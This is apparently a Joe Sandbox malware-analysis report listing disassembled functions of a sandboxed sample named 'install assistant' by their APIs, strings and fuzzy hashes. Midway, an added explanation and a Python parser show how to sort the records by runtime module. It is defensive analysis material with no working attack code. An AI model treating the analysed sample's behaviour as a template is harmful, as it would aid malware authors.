                                                            • Instruction Fuzzy Hash: 7031EB73704A050EF311862AC9853567223EBC37A8F69C76DD96687EECFA7198478183
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                            • Instruction ID: a851cd14f50bf4377390c7ea7e27388aa31a88b8ba0782c6cdf08b288da73bbb
                                                            • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                            • Instruction Fuzzy Hash: 5741A3B2904B068BD704DF19C89056AB3E4FF88318F454A6DEE5AE7381E331FA55CB91
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                            • Instruction ID: ed28857a6d5769129a561262bff769749f6250392e8674f4d08eb67c6ff42237
                                                            • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                            • Instruction Fuzzy Hash: 11214BB1A047E607E720DE6ECCC037577D39BC6305F094279D9608F647E1798892D6A0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dd244edcb321eb0178bb45a471bfe52d7ad1ac8c6226807032c761fbe5904b9
                                                            • Instruction ID: 052131a034e96885a82893bcb580781f61fdb0b42b2791c4fe7ac55eeea62de9
                                                            • Opcode Fuzzy Hash: 8dd244edcb321eb0178bb45a471bfe52d7ad1ac8c6226807032c761fbe5904b9
                                                            • Instruction Fuzzy Hash: E1F03032A15224DBEB12DB4CD405B8973BCEB45B65F110496E505DB650E7B8DD40D7D0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                            • Instruction ID: dfaa65b188daac0c0d320b6b829517e4cd39d1262cee7ad7241bc01ec009e29f
                                                            • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                            • Instruction Fuzzy Hash: 64E08C72A12238EBCB15EB98C940D8AB3ECEB44E05F1100D6F501D3610E274DE00D7D0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                            • API String ID: 3519838083-609671
                                                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                            • Instruction ID: 239a9dbb8b7f52d8b9ab89b6dfcef71eb36ce7b443db22a5b17fd1f9b86e0c60
                                                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                            • Instruction Fuzzy Hash: 20D17F72A04209DFCB21CFA4D990BEEB7B5FF45308F24855DE055A3A50EB70A949CBB4
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 6CC19B07
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC19B0F
                                                            • _ValidateLocalCookies.LIBCMT ref: 6CC19B98
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC19BC3
                                                            • _ValidateLocalCookies.LIBCMT ref: 6CC19C18
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: de8180a306f2c556f0732680e2a883da7975a2e9ae0bf263e8aaa26a24ec5007
                                                            • Instruction ID: 9e487191128f410faebc5a45cca9a14753c14290978e5bc36b368ad12c374dbd
                                                            • Opcode Fuzzy Hash: de8180a306f2c556f0732680e2a883da7975a2e9ae0bf263e8aaa26a24ec5007
                                                            • Instruction Fuzzy Hash: AC41E534A142189FCF10DF6AC880ADEBBB5FF46318F148155E8189BF91E735DA49CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 0-537541572
                                                            • Opcode ID: 7335cf618050b27182bfc71087ea3472cd77399268a43f6753ce086f8331ba49
                                                            • Instruction ID: a7d3ee99ef9f7e316ec9a66d2e7fef5f0c4d052a7c9c904edb0729f092bc567b
                                                            • Opcode Fuzzy Hash: 7335cf618050b27182bfc71087ea3472cd77399268a43f6753ce086f8331ba49
                                                            • Instruction Fuzzy Hash: A221D532E16A21ABDF318B698C40B4A37B8AB06768F354651E915E7A80F778DD0186F0
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,6CC2B0D0,?), ref: 6CC2BEF9
                                                            • __fassign.LIBCMT ref: 6CC2C0D8
                                                            • __fassign.LIBCMT ref: 6CC2C0F5
                                                            • WriteFile.KERNEL32(?,6CC35AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC2C13D
                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC2C17D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC2C229
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                            • String ID:
                                                            • API String ID: 4031098158-0
                                                            • Opcode ID: 631ab58d3484f0f3a6d6e29184fc90e09bfa7e6edbaecfe722fa91f2b27fca78
                                                            • Instruction ID: 68456bfab203958e4b2610cf0636a493a0346164117b476f556abcbca6264c40
                                                            • Opcode Fuzzy Hash: 631ab58d3484f0f3a6d6e29184fc90e09bfa7e6edbaecfe722fa91f2b27fca78
                                                            • Instruction Fuzzy Hash: F9D1A875E002989FEF15CFE8C8809EDBBB5BF09314F28416AE855FB641E735A906CB50
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2F95
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2FAF
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE2FD0
                                                            • __Getctype.LIBCPMT ref: 6CAE3084
                                                            • std::_Facet_Register.LIBCPMT ref: 6CAE309C
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE30B7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                            • String ID:
                                                            • API String ID: 1102183713-0
                                                            • Opcode ID: 3f2a8d4b43d86e1c55789f54b2ac02f24c3932bc5bb005739f25da21cca657e8
                                                            • Instruction ID: da0d06f5bf1da7fbf883113a0d47dd783085181d6e30d374d2b3001d969f7547
                                                            • Opcode Fuzzy Hash: 3f2a8d4b43d86e1c55789f54b2ac02f24c3932bc5bb005739f25da21cca657e8
                                                            • Instruction Fuzzy Hash: E64188B1E046548FDB10CF85D851B9EB7B4FF48728F088218D959ABB50EB30A945CBD0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: __aulldiv$__aullrem
                                                            • String ID:
                                                            • API String ID: 2022606265-0
                                                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                            • Instruction ID: b93657d9ee16e7ee7b83b60bd0d01d2689088cf9f40671aab8d307c5e9ea1cea
                                                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                            • Instruction Fuzzy Hash: 2721DD31900219FFDF208E949C40DCF7E69EF863A8F608226F521616D0F2718E71D7A5
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC5A6F1
                                                              • Part of subcall function 6CC69173: __EH_prolog.LIBCMT ref: 6CC69178
                                                            • __EH_prolog.LIBCMT ref: 6CC5A8F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: IJ$WIJ$J
                                                            • API String ID: 3519838083-740443243
                                                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                            • Instruction ID: 6133b6a9b09cadac8b384c5858f799cd36aca437d08712531d1b7e722281076d
                                                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                            • Instruction Fuzzy Hash: E071F130904655DFCB14CFA5C480BEDB7F0BF54308F5080A9D959ABB82EB74BA19CBA4
                                                            APIs
                                                            • _free.LIBCMT ref: 6CC35ADD
                                                            • _free.LIBCMT ref: 6CC35B06
                                                            • SetEndOfFile.KERNEL32(00000000,6CC346EC,00000000,6CC2B0D0,?,?,?,?,?,?,?,6CC346EC,6CC2B0D0,00000000), ref: 6CC35B38
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC346EC,6CC2B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC35B54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFileLast
                                                            • String ID: 8Q
                                                            • API String ID: 1547350101-4022487301
                                                            • Opcode ID: 2e8377c20c227c13120c260d12b54bc668d7333e5802c9bb0bf1f24529f51046
                                                            • Instruction ID: d31469795f2f66f6030806b1f7f4638ab48acab53a7ded8c4cea92c841e4c383
                                                            • Opcode Fuzzy Hash: 2e8377c20c227c13120c260d12b54bc668d7333e5802c9bb0bf1f24529f51046
                                                            • Instruction Fuzzy Hash: C441C732A00655AFDB019BB9EC81BDE3B75AF45328F242511E428E7B90FB35C8859760
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC6E41D
                                                              • Part of subcall function 6CC6EE40: __EH_prolog.LIBCMT ref: 6CC6EE45
                                                              • Part of subcall function 6CC6E8EB: __EH_prolog.LIBCMT ref: 6CC6E8F0
                                                              • Part of subcall function 6CC6E593: __EH_prolog.LIBCMT ref: 6CC6E598
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: &qB$0aJ$A0$XqB
                                                            • API String ID: 3519838083-1326096578
                                                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                            • Instruction ID: 3d0b4521f584ce0780188e75a22061e55ec5a7b52aa2eda5869fc096ac7d8784
                                                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                            • Instruction Fuzzy Hash: 30218E71D01258EACB04DBE5DA949EDBBB4AF15318F50802EE41577B81EB784E0CCB51
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC1F1B4,00000000,?,6CC1F235,6CC19C49,00000003,00000000), ref: 6CC1F13F
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC1F152
                                                            • FreeLibrary.KERNEL32(00000000,?,?,6CC1F1B4,00000000,?,6CC1F235,6CC19C49,00000003,00000000), ref: 6CC1F175
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 02d24c2fc0f57c2c6d62d6cd76764190afed15723ac347d8fe6a9160ea50a640
                                                            • Instruction ID: 7e08af0c9fe239c70ff415dd1ced8f8c1143fb93d7afb6b6582cd188c9d9a33c
                                                            • Opcode Fuzzy Hash: 02d24c2fc0f57c2c6d62d6cd76764190afed15723ac347d8fe6a9160ea50a640
                                                            • Instruction Fuzzy Hash: 7FF08C31A01518FBDF02EF91C809B9E7A78EB0536AF348060E801E2850EB708A01EAA0
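The records above are the Joe Sandbox IDA plugin's per-function summaries: the call sites the plugin attributed under "APIs" (a LIBCMT, LIBVCRUNTIME or LIBCPMT suffix marks statically linked MSVC runtime code, KERNEL32 a Win32 import), the memory dump region the function was lifted from, the strings it references, and the opcode and instruction fuzzy hashes used for similarity matching. When working through a dump of this size it helps to pull those fields into a structure and set aside functions whose only calls are runtime scaffolding, such as the security-cookie validation routine (String ID "csm", _ValidateLocalCookies) and the mscoree.dll/CorExitProcess lookup, which belong to the MSVC runtime rather than to the sample's own logic. The parser below is an added example and is not code from the Joe Sandbox report or its plugin; the sample input is constructed by copying three of the records above (trimmed to the fields the parser uses), and the list of runtime module names is an assumption.

```python
# Added example (not code from the Joe Sandbox report or its IDA plugin): parse the
# per-function records above and triage them by the modules they call.  Field names
# follow the report; the CRT module list and the sample records are constructed.
import re
from dataclasses import dataclass, field
from typing import Optional
# Assumed: modules the sandbox attributes to the statically linked MSVC runtime.
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME", "LIBCPMT"}
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\([^)]*\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)\s*$")
KV_RE = re.compile(r"^•\s+([A-Za-z ]+?):\s*(.*)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-F]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                          # call-site address in the dumped image
    subcall_of: Optional[str] = None  # set for "Part of subcall function X" lines

@dataclass
class FuncRecord:
    api_calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)
    dump_offset: int = 0              # "Offset:" of the Source File dump region
    def strings(self):
        # the report joins the referenced strings with '$' in "String ID"
        return [s for s in self.fields.get("String ID", "").split("$") if s]
    def call_offsets(self):
        # direct call sites, relative to the start of the dump region
        return [c.ref - self.dump_offset for c in self.api_calls if c.subcall_of is None]

def parse_records(text):
    records, cur, section = [], FuncRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            cur.api_calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), m["sub"]))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            off = OFFSET_RE.search(value)
            cur.dump_offset = int(off.group(1), 16) if off else 0
        cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":      # last line of every record
            records.append(cur)
            cur, section = FuncRecord(), None
    return records

def classify(rec):
    # "crt-only": every direct call is runtime scaffolding; "win32": look closer
    mods = {c.module for c in rec.api_calls if c.subcall_of is None}
    if not mods:
        return "no-apis"
    return "crt-only" if mods <= CRT_MODULES else "win32"

# Constructed input: three records copied from the report, trimmed to the fields used.
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC1F1B4,00000000,?,6CC1F235,6CC19C49,00000003,00000000), ref: 6CC1F13F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC1F152
• FreeLibrary.KERNEL32(00000000,?,?,6CC1F1B4,00000000,?,6CC1F235,6CC19C49,00000003,00000000), ref: 6CC1F175
Memory Dump Source
• Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 7FF08C31A01518FBDF02EF91C809B9E7A78EB0536AF348060E801E2850EB708A01EAA0
APIs
• _ValidateLocalCookies.LIBCMT ref: 6CC19B07
• ___except_validate_context_record.LIBVCRUNTIME ref: 6CC19B0F
• __IsNonwritableInCurrentImage.LIBCMT ref: 6CC19BC3
Memory Dump Source
• Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• String ID: csm
• Instruction Fuzzy Hash: AC41E534A142189FCF10DF6AC880ADEBBB5FF46318F148155E8189BF91E735DA49CB90
APIs
• __EH_prolog.LIBCMT ref: 6CC5A6F1
  • Part of subcall function 6CC69173: __EH_prolog.LIBCMT ref: 6CC69178
• __EH_prolog.LIBCMT ref: 6CC5A8F9
Memory Dump Source
• Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
• String ID: IJ$WIJ$J
• Instruction Fuzzy Hash: E071F130904655DFCB14CFA5C480BEDB7F0BF54308F5080A9D959ABB82EB74BA19CBA4
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(classify(r), [c.name for c in r.api_calls], r.strings(), [hex(o) for o in r.call_offsets()])
```

Run against the full report text, `classify` separates the CorExitProcess helper (a KERNEL32 caller, so "win32") from the cookie-validation and __EH_prolog functions ("crt-only"); the `call_offsets` values are relative to the dump region named in the record's Source File line, not to the module's image base, so two functions from different regions of the same DLL carry different bases. Subcall lines are kept but excluded from classification, since they describe a callee rather than the function itself.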
                                                            APIs
                                                            • __EH_prolog3.LIBCMT ref: 6CC1732E
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CC17339
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CC173A7
                                                              • Part of subcall function 6CC17230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CC17248
                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 6CC17354
                                                            • _Yarn.LIBCPMT ref: 6CC1736A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                            • String ID:
                                                            • API String ID: 1088826258-0
                                                            • Opcode ID: 0988695e90d4e0170d93b62e6c47ca41b3eb87d887a006fb89267861ab914afc
                                                            • Instruction ID: 3a5dd73bfb45ecd48df55f09e36c6f59d91bc79563517e16c7479895d345ea04
                                                            • Opcode Fuzzy Hash: 0988695e90d4e0170d93b62e6c47ca41b3eb87d887a006fb89267861ab914afc
                                                            • Instruction Fuzzy Hash: 1101DF756085209FDB05EF61C841ABC37B5FF86258B154009D90197F80EF34AA47EFD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
